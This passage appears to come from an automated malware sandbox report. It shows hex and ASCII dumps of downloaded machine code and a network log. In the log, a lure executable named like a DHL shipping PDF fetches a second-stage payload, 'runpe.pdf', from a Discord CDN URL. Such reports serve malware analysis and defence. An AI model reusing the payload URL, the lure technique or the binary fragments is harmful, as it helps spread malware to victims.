                                            2021-09-27 18:36:57 UTC26INData Raw: 53 e8 5d d8 00 00 83 c4 08 50 e8 b4 d8 00 00 83 c4 08 85 c0 74 16 8b 75 0c 6a 14 c7 46 18 05 00 00 00 e8 d0 67 01 00 e9 19 ff ff ff 57 bf 06 00 00 00 be 7d 00 00 00 8d 85 f8 fe ff ff 50 56 53 e8 1e d8 00 00 83 c4 08 50 e8 75 d8 00 00 83 c4 08 85 c0 0f 85 88 00 00 00 46 47 81 fe a4 00 00 00 76 d4 be a5 00 00 00 8d 8d f8 fe ff ff 51 56 53 e8 ed d7 00 00 83 c4 08 50 e8 44 d8 00 00 83 c4 08 85 c0 75 63 46 81 fe a8 00 00 00 76 d9 8b 55 fc 8b 75 0c 83 c2 fc 52 8d 85 f8 fe ff ff 50 8d 8e d8 08 00 00 51 c7 46 18 5c 00 00 00 c7 86 d4 08 00 00 01 00 00 00 e8 e6 3a 01 00 83 c4 0c 6a 14 e8 dd 67 01 00 83 c0 02 50 81 c6 a6 04 00 00 56 e8 9c e6 00 00 83 c4 0c 5f 5e 5b 8b e5 5d c3 8b 75 0c 89 7e 18 eb d7 8b 75 0c c7 46 18 0c 00 00 00 eb cb cc cc cc cc cc cc cc cc cc cc
                                            Data Ascii: S]PtujFgW}PVSPuFGvQVSPDucFvUuRPQF\:jgPV_^[]u~uF
                                            2021-09-27 18:36:57 UTC28INData Raw: 52 fe f9 04 42 a9 83 7c 27 a3 df 5c 44 87 08 51 03 b8 be 2a 23 26 3f 83 b8 98 48 d8 ae 16 b9 38 b6 42 e8 97 57 1f 95 76 19 4a 9e 5f fb aa fd c5 75 05 c5 90 90 90 90 5b 5f b8 01 00 00 00 5e 8b e5 5d c3 5b 5f 33 c0 5e 8b e5 5d c3 ed 38 07 3c a5 7f 20 65 0a ee 39 25 eb 25 55 8b ec 8b 45 0c 83 ec 3c 50 e8 d1 38 01 00 83 c4 04 3d 00 10 00 00 0f 87 58 01 00 00 56 8b 75 08 8b 8e d8 07 00 00 85 c9 0f 84 45 01 00 00 53 57 8d 3c 00 8d 99 6c f5 1f 00 8b 4d 0c 57 53 51 e8 bb 38 01 00 83 c4 0c 85 c0 0f 85 22 01 00 00 8b 55 0c 57 52 53 e8 95 35 01 00 83 c4 0c 33 c9 33 c0 68 04 01 00 00 66 89 4d fc 8b 8e c0 0c 00 00 8d 9e 68 44 00 00 53 c7 45 f4 0d 00 0a 00 c7 45 f8 0d 00 0a 00 c7 45 c4 43 00 6c 00 c7 45 c8 69 00 70 00 c7 45 cc 62 00 6f 00 c7 45 d0 61 00 72 00 c7 45 d4
                                            Data Ascii: RB|'\DQ*#&?H8BWvJ_u[_^][_3^]8< e9%%UE<P8=XVuESW<lMWSQ8"UWRS533hfMhDSEEEClEipEboEarE
                                            2021-09-27 18:36:57 UTC29INData Raw: e0 06 6a 1c 56 8d bc 08 b8 00 00 00 e8 10 31 01 00 c7 06 1c 00 00 00 c7 46 04 00 00 00 00 8b 57 24 89 56 08 8b 47 20 89 46 0c 8b 4f 2c 89 4e 10 8b 57 34 83 c4 08 89 56 14 8b 47 38 89 46 18 5f b8 01 00 00 00 5e 5d c3 75 cb 26 2c 47 21 01 48 2e 55 8b ec 8b 55 0c 85 d2 74 1f 8b 45 08 85 c0 74 18 8b 08 52 51 c7 40 08 00 00 00 00 89 48 0c e8 ac fe ff ff 83 c4 08 5d c3 33 c0 5d c3 fe f6 03 55 8b ec 8b 55 0c 85 d2 74 29 8b 45 08 85 c0 74 22 8b 48 0c 8b 09 85 c9 74 19 01 48 0c c7 40 08 00 00 00 00 8b 40 0c 52 50 e8 72 fe ff ff 83 c4 08 5d c3 33 c0 5d c3 6f 21 1c 28 7c c5 0f f2 76 55 8b ec 56 8b 75 0c 85 f6 74 28 8b 4d 08 85 c9 74 21 8b 51 0c 8b 41 08 3b 42 04 73 16 57 50 8d 78 01 56 52 89 79 08 e8 04 ff ff ff 83 c4 0c 5f 5e 5d c3 33 c0 5e 5d c3 18 96 1e f0 ee 83
                                            Data Ascii: jV1FW$VG FO,NW4VG8F_^]u&,G!H.UUtEtRQ@H]3]UUt)Et"HtH@@RPr]3]o!(|vUVut(Mt!QA;BsWPxVRy_^]3^]
                                            2021-09-27 18:36:57 UTC30INData Raw: 7e d7 71 64 38 e7 c8 09 55 8b ec 83 ec 58 53 56 57 6a 34 8d 45 ac 6a 00 50 e8 fa 2b 01 00 8b 45 0c 8b 48 10 8b 5d 08 6a 06 8d 55 a8 52 50 53 89 4d a8 e8 91 05 01 00 83 c4 1c 83 7d b8 00 0f 84 7e 01 00 00 8b 75 14 8b 4d 1c 8d 86 f8 02 00 00 50 51 e8 11 fb ff ff 83 c4 08 83 7d d8 00 0f 84 5e 01 00 00 83 7d d4 00 0f 84 54 01 00 00 8b 45 dc 85 c0 0f 84 49 01 00 00 83 7d c8 00 0f 84 3f 01 00 00 8b 96 d8 02 00 00 89 10 8b 86 d4 02 00 00 8b 4d c8 8b 55 18 89 01 8b 42 08 8b 4d d8 89 01 8b 96 00 03 00 00 8b 45 d4 89 10 81 86 d4 02 00 00 00 80 02 00 e8 dd 23 01 00 8b be d8 02 00 00 b9 00 f0 ff ff 2b c8 01 8e d4 02 00 00 6a 71 53 81 c7 00 02 05 00 e8 1c 14 00 00 50 6a 00 e8 74 20 01 00 89 45 f8 8b 86 d8 02 00 00 83 c4 10 05 00 04 05 00 68 22 02 00 00 89 45 fc e8 36
                                            Data Ascii: ~qd8UXSVWj4EjP+EH]jURPSM}~uMPQ}^}TEI}?MUBME#+jqSPjt Eh"E6
                                            2021-09-27 18:36:57 UTC31INData Raw: 50 56 e8 03 e5 ff ff 83 c4 08 85 db 75 1b 8d 8d 90 f9 ff ff 51 8d 55 ec 52 e8 bc f6 ff ff 83 c4 08 85 c0 0f 85 a1 fd ff ff 8d 45 ec 50 56 e8 27 f7 ff ff 83 c4 08 5f 5e 8b c3 5b 8b e5 5d c3 e2 ef 4d 90 e6 f7 3a ff 34 79 ab 55 8b ec 53 8b 5d 10 56 8b 75 14 57 8b 7d 08 6a 1d 56 53 57 e8 27 fd ff ff 83 c4 10 85 c0 75 20 6a 1d 56 53 57 e8 16 fd ff ff 83 c4 10 85 c0 75 0f 56 50 8b 45 0c 50 57 e8 63 5a 00 00 83 c4 10 5f 5e 5b 5d c3 03 61 88 fb dc ba 0d fe 5e d8 0d 55 8b ec 83 ec 0c 8b 4d 08 53 56 57 8b 7d 0c 8b 87 40 02 00 00 6a 04 68 00 30 00 00 50 6a 00 51 e8 eb 25 01 00 8b 5d 10 89 03 8b 97 40 02 00 00 8b 4f 10 52 51 50 e8 75 26 01 00 8b 03 03 07 8b 33 89 43 04 40 83 c4 20 89 43 08 89 75 fc e8 48 3e 01 00 8b 55 08 8b ce 2b 4a 04 8d 44 08 03 89 43 0c 8b 8f 40
                                            Data Ascii: PVuQUREPV'_^[]M:4yUS]VuW}jVSW'u jVSWuVPEPWcZ_^[]a^UMSVW}@jh0PjQ%]@ORQPu&3C@ CuH>U+JDC@
                                            2021-09-27 18:36:57 UTC33INData Raw: 04 7b 47 83 c4 04 83 ff 40 72 e7 eb 12 6a 00 8d 8d f8 fd ff ff 51 56 e8 95 1d 00 00 83 c4 0c 6a 01 56 e8 6a 52 00 00 83 c4 08 85 c0 0f 85 d6 00 00 00 68 00 10 00 00 56 e8 64 23 01 00 68 00 10 00 00 56 89 86 58 0b 00 00 e8 53 23 01 00 68 00 10 00 00 56 89 86 5c 0b 00 00 e8 42 23 01 00 8d be 2c 0a 00 00 57 56 89 86 90 0b 00 00 e8 7f 2f 00 00 6a 00 6a 01 57 56 89 86 20 0a 00 00 e8 ee ba 00 00 6a 00 6a 15 57 56 89 86 94 0b 00 00 e8 dd ba 00 00 83 c4 40 83 be 20 0a 00 00 00 89 86 98 0b 00 00 75 1a 57 56 e8 b4 3a 00 00 57 56 e8 8d 30 00 00 83 c4 10 83 be 20 0a 00 00 00 74 3f 6a 00 6a 16 57 56 e8 a6 ba 00 00 83 c4 10 83 be 20 0a 00 00 00 89 86 28 0a 00 00 74 22 8b 86 58 0b 00 00 85 c0 74 18 83 be f0 09 00 00 00 74 0f 66 83 38 00 75 09 56 e8 05 3b 00 00 83 c4 04
                                            Data Ascii: {G@rjQVjVjRhVd#hVXS#hV\B#,WV/jjWV jjWV@ uWV:WV0 t?jjWV (t"Xttf8uV;
                                            2021-09-27 18:36:57 UTC34INData Raw: 85 c0 75 46 8d 85 e4 fd ff ff 50 6a 0a 6a 77 6a 6f 56 e8 41 b9 00 00 83 c4 08 50 e8 68 27 01 00 83 c4 10 85 c0 75 23 8d 8d e4 fd ff ff 51 6a 0a 6a 78 6a 70 56 e8 1e b9 00 00 83 c4 08 50 e8 45 27 01 00 83 c4 10 85 c0 74 0d 8b 56 04 31 96 98 04 00 00 b3 01 eb 07 83 86 68 04 00 00 f7 00 5e 2d 8a 46 2d fe c0 00 46 2e 5e b8 01 00 00 00 5b 8b e5 5d c3 1c a3 39 26 55 8b ec 53 56 57 6a 00 32 db e8 e1 13 01 00 8b 75 08 8b f8 83 c4 04 83 7f 18 00 0f 84 fb 00 00 00 8b 47 28 50 6a 08 6a 5c 6a 63 56 e8 af b8 00 00 83 c4 08 50 e8 d6 26 01 00 83 c4 10 85 c0 0f 85 f3 00 00 00 8b 4f 28 51 6a 0c 6a 5c 6a 64 56 e8 8b b8 00 00 83 c4 08 50 e8 b2 26 01 00 83 c4 10 85 c0 0f 85 cf 00 00 00 8b 57 28 52 6a 08 6a 5c 6a 65 56 e8 67 b8 00 00 83 c4 08 50 e8 8e 26 01 00 83 c4 10 85 c0
                                            Data Ascii: uFPjjwjoVAPh'u#QjjxjpVPE'tV1h^-F-F.^[]9&USVWj2uG(Pjj\jcVP&O(Qjj\jdVP&W(Rjj\jeVgP&
                                            2021-09-27 18:36:57 UTC35INData Raw: e8 4a e7 ff ff 83 c4 08 5f 84 db 75 14 0f 31 33 c9 03 c8 0f 31 2b c1 89 45 fc 83 86 5c 05 00 00 ba 00 5e 31 8a 46 31 fe c0 00 46 32 5e b8 01 00 00 00 5b 8b e5 5d c3 2a 05 12 be 33 98 87 14 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 68 bb 00 00 00 50 e8 9f b3 00 00 50 e8 29 11 01 00 83 c4 0c 5d c3 52 19 ac ed 55 8b ec 8b 55 0c 8b 45 08 6b d2 0d 8d 48 28 51 8d 4c 02 44 51 83 c0 1c 50 e8 02 0e 01 00 83 c4 0c 5d c3 27 b6 c5 14 a6 a0 11 52 bf 19 97 29 3e 55 8b ec 8b 45 0c 8b 4d 08 50 51 e8 50 b3 00 00 50 e8 aa 0e 01 00 83 c4 0c 5d c3 cf 23 c5 f0 68 55 8b ec 53 56 8b 75 08 57 8d 7e 28 8d 46 44 57 50 8d 5e 1c 53 e8 b6 0d 01 00 89 86 a0 0b 00 00 57 8d 46 44 50 53 e8 a5 0d 01 00 8b 4e 04 57 8d 56 51 52 33 c8 53 89 8e 14 0a 00 00 e8 8f 0d 01
                                            Data Ascii: J_u131+E\^1F1F2^[]*3UEhPP)]RUUEkH(QLDQP]'R)>UEMPQPP]#hUSVuW~(FDWP^SWFDPSNWVQR3S
                                            2021-09-27 18:36:57 UTC37INData Raw: f8 c1 c6 05 8b d1 33 d0 33 d3 03 f2 03 b4 bd b8 fe ff ff 8b 55 f4 8d 94 16 a1 eb d9 6e c1 cb 02 8b f0 33 c3 89 4d f4 8b 4d f8 33 c1 89 55 f8 c1 c2 05 03 d0 03 94 bd bc fe ff ff 8b 45 f4 c1 c9 02 8d 84 02 a1 eb d9 6e 8b 55 f8 89 5d fc 89 4d fc 89 45 f8 c1 c0 05 8b cb 33 4d fc 83 c7 05 33 ca 03 c1 03 84 bd ac fe ff ff 8b 4d f8 c1 ca 02 8d b4 30 a1 eb d9 6e 8b 45 fc 89 55 fc 89 75 f8 8b d0 33 55 fc c1 c6 05 33 d1 03 f2 03 b4 bd b0 fe ff ff 8b 55 fc 8d b4 1e a1 eb d9 6e 89 45 f4 8b 45 f8 c1 c9 02 89 75 f8 83 ff 28 0f 8c 27 ff ff ff c7 45 fc 28 00 00 00 c1 c6 05 03 75 f4 89 55 f4 8b f9 0b f8 23 fa 8b d9 23 d8 0b fb 8b 5d fc 03 bc 9d b4 fe ff ff c1 c8 02 8d b4 37 dc bc 1b 8f 8b 7d f8 89 75 f8 c1 c6 05 03 75 f4 8b d0 0b d7 23 d1 8b d8 23 df 0b d3 8b 5d fc 03 94
                                            Data Ascii: 33Un3MM3UEnU]ME3M3M0nEUu3U3UnEEu('E(uU##]7}uu##]
                                            2021-09-27 18:36:57 UTC38INData Raw: e1 0f 0f b6 54 8d c0 88 50 02 83 c0 03 c6 00 3d 40 c6 00 00 2b 45 08 5f 5e 40 5b 8b e5 5d c3 ce 3a ce 3f 55 06 8a e5 0e 16 e4 77 b5 4c 55 8b ec 81 ec 00 01 00 00 8b 4d 0c 56 c7 85 00 ff ff ff 40 40 40 40 c7 85 04 ff ff ff 40 40 40 40 c7 85 08 ff ff ff 40 40 40 40 c7 85 0c ff ff ff 40 40 40 40 c7 85 10 ff ff ff 40 40 40 40 c7 85 14 ff ff ff 40 40 40 40 c7 85 18 ff ff ff 40 40 40 40 c7 85 1c ff ff ff 40 40 40 40 c7 85 20 ff ff ff 40 40 40 40 c7 85 24 ff ff ff 40 40 40 40 c7 85 28 ff ff ff 40 40 40 3e b2 3f c7 85 2c ff ff ff 40 40 40 3f c7 85 30 ff ff ff 34 35 36 37 c7 85 34 ff ff ff 38 39 3a 3b c7 85 38 ff ff ff 3c 3d 40 40 c7 85 3c ff ff ff 40 40 40 40 c7 85 40 ff ff ff 40 00 01 02 c7 85 44 ff ff ff 03 04 05 06 c7 85 48 ff ff ff 07 08 09 0a c7 85 4c ff ff
                                            Data Ascii: TP=@+E_^@[]:?UwLUMV@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@$@@@@(@@@>?,@@@?04567489:;8<=@@<@@@@@@DHL
                                            2021-09-27 18:36:57 UTC39INData Raw: 05 33 c0 5e 5d c3 83 7e 60 00 75 10 56 e8 22 f8 ff ff 83 c4 04 c7 46 60 01 00 00 00 b8 01 00 00 00 5e 5d c3 55 8b ec 83 7d 10 00 74 59 56 8b 75 08 83 7e 60 00 75 51 83 7e 64 00 75 4b 53 57 8b 7d 0c bb 01 00 00 00 29 5d 10 83 7e 64 00 75 33 8b 46 5c 8a 0f 88 4c 30 1c 01 5e 5c 83 46 14 08 8b 46 5c 75 08 01 5e 18 75 03 89 5e 64 83 f8 40 75 09 56 e8 6c f2 ff ff 83 c4 04 03 fb 83 7d 10 00 75 c4 5f 5b 5e 5d c3 c7 46 64 01 00 00 00 5e 5d c3 cc cc 55 8b ec 5d e9 27 fe ff ff 62 74 5a 84 e6 d3 c0 55 8b ec 56 8b 75 0c 57 8b 7d 08 83 fe 01 76 29 8d 44 37 fe 8d 4e ff 8a 50 01 28 10 48 49 75 f7 83 fe 01 76 14 8b c7 8d 4e ff 8d 9b 00 00 00 00 8a 50 01 28 10 40 49 75 f7 8b 45 10 50 56 57 e8 dc fd ff ff 83 c4 0c 83 fe 01 76 23 8d 44 37 fe 8d 4e ff 8a 50 01 28 10 48 49 75
                                            Data Ascii: 3^]~`uV"F`^]U}tYVu~`uQ~duKSW})]~du3F\L0^\FF\u^u^d@uVl}u_[^]Fd^]U]'btZUVuW}v)D7NP(HIuvNP(@IuEPVWv#D7NP(HIu
                                            2021-09-27 18:36:57 UTC41INData Raw: ff ff 85 c9 74 0f eb 03 8d 49 00 49 0f b6 10 8d 44 10 01 75 f6 0f b6 10 53 8b 5d 08 56 57 8d 8b b8 07 00 00 51 8d 70 01 52 56 e8 1c fb ff ff 8b 7d 14 83 c4 0c 56 83 ff 04 75 1b e8 6b 04 01 00 40 50 8b 45 0c 56 50 e8 8f 01 01 00 83 c4 10 5f 5e 5b 8b e5 5d c3 8d 8d e8 fd ff ff 51 e8 69 08 01 00 83 c4 08 85 ff 0f 85 80 00 00 00 33 d2 68 06 02 00 00 52 8d 85 e2 fb ff ff 50 66 89 95 e0 fb ff ff e8 d3 01 01 00 68 04 01 00 00 8d 8d e8 fd ff ff 51 8d 55 f0 52 e8 4e 10 01 00 68 04 01 00 00 8d 85 e0 fb ff ff 50 8d 4d f8 51 e8 39 10 01 00 8d 55 f8 52 8d 45 f0 50 57 53 e8 5a df 00 00 83 c4 34 85 c0 78 49 8b 4d fc 51 e8 fa 03 01 00 8b 4d 0c 8d 54 00 02 8b 45 fc 52 50 51 e8 f8 00 01 00 83 c4 10 5f 5e 5b 8b e5 5d c3 8d 95 e8 fd ff ff 52 e8 d2 03 01 00 8b 55 0c 8d 44 00
                                            Data Ascii: tIIDuS]VWQpRV}Vuk@PEVP_^[]Qi3hRPfhQURNhPMQ9UREPWSZ4xIMQMTERPQ_^[]RUD
                                            2021-09-27 18:36:57 UTC42INData Raw: 0c 83 ec 10 8b c4 89 38 8b 7d c8 89 78 04 89 48 08 8b 4d d0 52 8b 56 24 89 48 0c ff d2 39 5d fc 0f 84 82 00 00 00 8b 55 f8 8b 4d 10 8b 32 b8 08 00 00 00 66 89 45 c4 8b 7d c4 8d 45 f4 50 83 ec 10 8b c4 89 38 8b 7d c8 89 78 04 89 48 08 8b 4d d0 52 8b 56 24 89 48 0c ff d2 8b 45 fc 8b 08 39 5d f4 74 3e 8d 55 ec 52 50 8b 41 2c ff d0 8b 45 ec 3b c3 74 1d 8b 08 8d 55 e4 52 50 8b 41 1c ff d0 83 7d e4 01 7d 35 8b 45 ec 8b 08 8b 51 08 50 ff d2 8b 45 f4 8b 08 8b 51 08 50 ff d2 8b 45 fc 8b 08 8b 51 08 50 ff d2 8b 45 f8 8b 08 8b 51 08 50 ff d2 33 c0 5f 5e 5b 8b e5 5d c3 33 c0 8d 4d e8 51 89 45 d8 8b 45 ec 8d 4d d4 c7 45 d4 00 04 02 00 c7 45 dc c0 00 00 00 c7 45 e0 00 00 00 46 8b 10 8b 12 51 50 ff d2 8b 4d e8 b8 09 00 00 00 66 89 85 6c ff ff ff 8b 45 f4 8b 30 83 ec 10
                                            Data Ascii: 8}xHMRV$H9]UM2fE}EP8}xHMRV$HE9]t>URPA,E;tURPA}}5EQPEQPEQPEQP3_^[]3MQEEMEEEFQPMflE0
                                            2021-09-27 18:36:57 UTC43INData Raw: 00 6a 01 8d 55 f0 52 8b 11 6a 00 6a 00 6a 00 8d 45 f8 50 8b 45 f4 52 50 53 e8 cb d8 00 00 83 c4 2c 85 c0 79 23 8b 4d fc 8b 13 51 52 53 e8 07 d9 00 00 8b 45 f4 50 53 e8 2d dd 00 00 83 c4 14 5f 5e 33 c0 5b 8b e5 5d c3 8b 45 fc 33 ff 8b d8 85 f6 74 1a 8d 9b 00 00 00 00 50 e8 da fc 00 00 88 04 1f 47 83 c4 04 3b fe 72 ef 8b 45 fc 8b 7d 10 8b 8f 40 02 00 00 8b 55 14 01 75 f8 51 03 c6 52 50 89 45 fc e8 a0 f6 00 00 83 c4 0c 83 7d 18 06 75 20 8b 45 f4 8b 4d 08 50 51 e8 ca dc 00 00 8b 55 f8 8b 45 fc 83 c4 08 89 57 1c 5f 5e 5b 8b e5 5d c3 8b 45 fc 2b c6 8b 75 08 8b 0e 50 51 56 e8 75 d8 00 00 8b 55 f4 52 56 e8 9b dc 00 00 8b 07 83 c4 14 03 45 f8 5f 5e 5b 8b e5 5d c3 12 20 e6 f0 30 07 b0 5c cf c1 fe 37 55 8b ec 83 ec 08 8b 55 10 6a 04 6a 00 6a 01 8d 45 f8 50 8b 02 6a
                                            Data Ascii: jURjjjEPERPS,y#MQRSEPS-_^3[]E3tPG;rE}@UuQRPE}u EMPQUEW_^[]E+uPQVuURVE_^[] 0\7UUjjjEPj
                                            2021-09-27 18:36:57 UTC45INData Raw: 66 89 85 78 fc ff ff e8 44 f2 00 00 6a 7e 8d 95 82 fe ff ff 6a 00 52 e8 34 f2 00 00 6a 7e 8d 85 02 ff ff ff 6a 00 50 e8 24 f2 00 00 b9 5c 00 00 00 33 c0 8b d1 6a 7e 66 89 8d 80 fe ff ff 50 8d 4d 82 51 66 89 95 00 ff ff ff 66 89 45 80 e8 fd f1 00 00 6a 05 6a 05 8d 55 80 52 56 e8 2f ef ff ff 83 c4 40 8d 85 78 fc ff ff 50 8d 4d 80 51 56 e8 eb ed ff ff 8d 55 80 52 e8 42 f4 00 00 8b 7d 0c 03 c0 50 8d 85 78 fc ff ff 57 50 e8 4f f4 00 00 83 c4 1c 85 c0 74 0b 5f b8 01 00 00 00 5e 8b e5 5d c3 6a 00 6a 03 8d 8d 78 fc ff ff 51 56 e8 dc ee ff ff 8d 95 82 fe ff ff 57 52 e8 3f f6 00 00 8d 85 02 ff ff ff 57 50 e8 82 86 ff ff 6a 00 8d 8d 00 ff ff ff 51 8d 95 78 fc ff ff 52 e8 4d f5 00 00 6a 00 8d 85 80 fe ff ff 50 8d 8d 78 fc ff ff 51 e8 38 f5 00 00 6a 00 6a 15 8d 95 78
                                            Data Ascii: fxDj~jR4j~jP$\3j~fPMQffEjjURV/@xPMQVURB}PxWPOt_^]jjxQVWR?WPjQxRMjPxQ8jjx
                                            2021-09-27 18:36:57 UTC46INData Raw: 00 6a 00 6a 00 8d 45 e8 50 8b 45 08 8d 55 e0 89 55 f0 8b 55 0c 51 52 50 c7 45 e8 18 00 00 00 c7 45 ec 00 00 00 00 c7 45 f4 40 00 00 00 c7 45 f8 00 00 00 00 c7 45 fc 00 00 00 00 e8 77 ce 00 00 33 c9 83 c4 48 85 c0 0f 99 c1 5e 8b c1 8b e5 5d c3 3a 07 93 4b 7b 90 55 8b ec 81 ec 08 02 00 00 33 c0 68 fe 01 00 00 50 8d 8d fa fd ff ff 51 66 89 85 f8 fd ff ff e8 7c ec 00 00 8b 45 10 83 c4 0c 85 c0 74 14 68 00 01 00 00 50 8d 55 f8 52 e8 f3 fa 00 00 83 c4 0c eb 44 6a 0c 6a 05 e8 a5 dd ff ff 0f b6 c0 83 c4 08 50 8d 8d f8 fd ff ff 51 e8 b2 ee 00 00 8d 94 45 f8 fd ff ff 83 c4 04 52 e8 52 fc 00 00 68 00 01 00 00 8d 85 f8 fd ff ff 50 8d 4d f8 51 e8 ad fa 00 00 83 c4 14 56 8b 75 14 56 e8 80 ee 00 00 03 c0 50 8b 45 0c 8b 08 56 6a 01 6a 00 8d 55 f8 52 8b 55 08 51 52 e8 05
                                            Data Ascii: jjEPEUUUQRPEEE@EEw3H^]:K{U3hPQf|EthPURDjjPQERRhPMQVuVPEVjjURUQR
                                            2021-09-27 18:36:57 UTC47INData Raw: 8d 00 fc ff ff 6a 0a 51 e8 01 ea 00 00 83 c4 04 8d 94 45 ee fb ff ff 52 56 e8 c0 e4 ff ff 83 c4 10 68 1f 02 02 00 8d 85 00 fc ff ff 50 8d 4d 08 51 56 e8 17 fa ff ff 8b 55 0c 52 6a 00 8d 45 08 50 56 e8 b7 fa ff ff 83 c4 20 83 be 58 0b 00 00 00 74 25 8d 8d 00 fc ff ff 51 e8 af e9 00 00 03 c0 50 8b 86 58 0b 00 00 8d 95 00 fc ff ff 52 50 e8 a9 e6 00 00 83 c4 10 8b 4d 08 51 56 e8 dc cc 00 00 83 c4 08 5e 8b e5 5d c3 ae 50 cb 6c 55 8b ec 81 ec 10 04 00 00 56 57 33 c0 68 0e 04 00 00 50 8d 8d f2 fb ff ff 51 66 89 85 f0 fb ff ff e8 ea e6 00 00 8b 75 08 6a 01 6a 09 8d 95 f0 fb ff ff 52 56 e8 16 e4 ff ff 8b 7d 0c 57 e8 3d e9 00 00 83 c4 20 03 c0 50 8d 85 f0 fb ff ff 57 50 e8 2a e9 00 00 8d 8c 45 f0 fb ff ff 83 c4 04 51 e8 2a e6 00 00 8d 95 f0 fb ff ff 52 e8 0e e9 00
                                            Data Ascii: jQERVhPMQVURjEPV Xt%QPXRPMQV^]PlUVW3hPQfujjRV}W= PWP*EQ*R
                                            2021-09-27 18:36:57 UTC49INData Raw: 00 50 8b 86 a4 0c 00 00 6a 00 6a 00 50 57 e8 32 7f 00 00 6a 44 56 89 86 b4 0c 00 00 e8 64 7e 00 00 8b 8e a4 0c 00 00 83 c4 40 50 6a 00 6a 00 51 57 e8 0f 7f 00 00 83 c4 14 83 be b0 0c 00 00 00 89 86 bc 0c 00 00 0f 84 03 02 00 00 83 be b4 0c 00 00 00 0f 84 f6 01 00 00 85 c0 0f 84 ee 01 00 00 53 6a 0c 8d 55 dc 52 8d 86 68 4c 00 00 50 c7 45 dc 5b 00 45 00 c7 45 e0 73 00 63 00 c7 45 e4 5d 00 00 00 e8 3c e1 00 00 6a 0c 8d 4d f4 51 8d 96 80 4c 00 00 52 c7 45 f4 5b 00 41 00 c7 45 f8 6c 00 74 00 c7 45 fc 5d 00 00 00 e8 15 e1 00 00 6a 0c 8d 45 e8 50 8d 8e 98 4c 00 00 51 c7 45 e8 5b 00 54 00 c7 45 ec 61 00 62 00 c7 45 f0 5d 00 00 00 e8 ee e0 00 00 6a 10 8d 4d bc 51 8d 96 b0 4c 00 00 52 c7 45 bc 5b 00 45 00 c7 45 c0 6e 00 74 00 c7 45 c4 65 00 72 00 c7 45 c8 5d 00 00
                                            Data Ascii: PjjPW2jDVd~@PjjQWSjURhLPE[EEscE]<jMQLRE[AEltE]jEPLQE[TEabE]jMQLRE[EEntEerE]
                                            2021-09-27 18:36:57 UTC50INData Raw: 00 52 8d 8c 46 e8 3f 00 00 51 bf 01 00 00 00 e8 58 dc 00 00 83 86 c0 3e 00 00 02 6a 02 56 e8 d9 fc ff ff 83 c4 14 8b c7 5f 5e 5d c3 83 f8 0d 75 15 8b 75 08 6a 10 8d 86 b0 4c 00 00 50 8d 8e e8 3f 00 00 51 eb 9b 83 f8 09 75 24 8b 75 08 6a 0c 8d 96 98 4c 00 00 52 8d 86 e8 3f 00 00 50 e8 09 dc 00 00 c7 86 c0 3e 00 00 05 00 00 00 eb 81 83 f8 1b 75 27 8b 75 08 6a 0c 8d 8e 68 4c 00 00 51 8d 96 e8 3f 00 00 52 e8 e0 db 00 00 c7 86 c0 3e 00 00 05 00 00 00 e9 55 ff ff ff 83 f8 12 75 27 8b 75 08 6a 0c 8d 86 80 4c 00 00 50 8d 8e e8 3f 00 00 51 e8 b4 db 00 00 c7 86 c0 3e 00 00 05 00 00 00 e9 29 ff ff ff 83 c0 90 83 f8 17 0f 87 53 ff ff ff 5f b8 01 00 00 00 5e 5d c3 55 8b ec 8b 45 0c 53 8b 58 08 56 8b 75 08 57 0f bf 78 0e 8b 86 b4 0c 00 00 6a 14 81 e7 ff 00 00 00 ff d0
                                            Data Ascii: RF?QX>jV_^]uujLP?Qu$ujLR?P>u'ujhLQ?R>Uu'ujLP?Q>)S_^]UESXVuWxj
                                            2021-09-27 18:36:57 UTC52INData Raw: 00 6a 00 50 57 e8 89 74 00 00 83 c4 1c 89 86 bc 0c 00 00 85 c0 74 33 8b 8e a0 0b 00 00 68 4f 08 75 b9 6a 00 6a 00 51 57 e8 66 74 00 00 8b f8 83 c4 14 85 ff 74 14 6a 00 6a 00 56 e8 6b 0b 01 00 83 c0 02 50 6a 00 6a 00 ff d7 5f b8 01 00 00 00 5e 8b e5 5d c3 5f 33 c0 5e 8b e5 5d c3 e9 ad 64 e7 5b 38 55 8b ec 81 ec 08 02 00 00 56 8b 75 08 57 8b be d8 07 00 00 85 ff 0f 84 29 01 00 00 83 bf a4 a9 00 00 00 0f 84 1c 01 00 00 8b 86 28 0a 00 00 53 50 56 e8 b9 bc 00 00 33 c9 68 06 02 00 00 51 8d 95 fa fd ff ff 52 c7 86 28 0a 00 00 00 00 00 00 66 89 8d f8 fd ff ff e8 d4 d6 00 00 8b 86 58 0b 00 00 6a 01 50 8d 4d 08 51 56 e8 e1 ea ff ff 6a 00 6a 03 8d 95 f8 fd ff ff 52 56 e8 f0 d3 ff ff 8d 85 f8 fd ff ff 50 e8 14 d9 00 00 b9 5c 00 00 00 6a 00 8d 97 ec ac 00 00 66 89 8c
                                            Data Ascii: jPWtt3hOujjQWfttjjVkPjj_^]_3^]d[8UVuW)(SPV3hQR(fXjPMQVjjRVP\jf


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            1 | 192.168.2.3 | 49740 | 162.159.133.233 | 443 | C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            2021-09-27 18:36:57 UTC | 165 | OUT | GET /attachments/889935662827044904/889981640498090054/runpe.pdf HTTP/1.1
                                            Host: cdn.discordapp.com
                                            2021-09-27 18:36:57 UTC | 165 | IN | HTTP/1.1 200 OK
                                            Date: Mon, 27 Sep 2021 18:36:57 GMT
                                            Content-Type: application/pdf
                                            Content-Length: 413184
                                            Connection: close
                                            CF-Ray: 6956d7294eb10f52-MXP
                                            Accept-Ranges: bytes
                                            Age: 39
                                            Cache-Control: public, max-age=31536000
                                            Content-Disposition: attachment;%20filename=runpe.pdf
                                            ETag: "27a5260c3d72986f4e22a50865143075"
                                            Expires: Tue, 27 Sep 2022 18:36:57 GMT
                                            Last-Modified: Tue, 21 Sep 2021 21:09:18 GMT
                                            Vary: Accept-Encoding
                                            CF-Cache-Status: HIT
                                            Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                            x-goog-generation: 1632258558207603
                                            x-goog-hash: crc32c=9NZa8w==
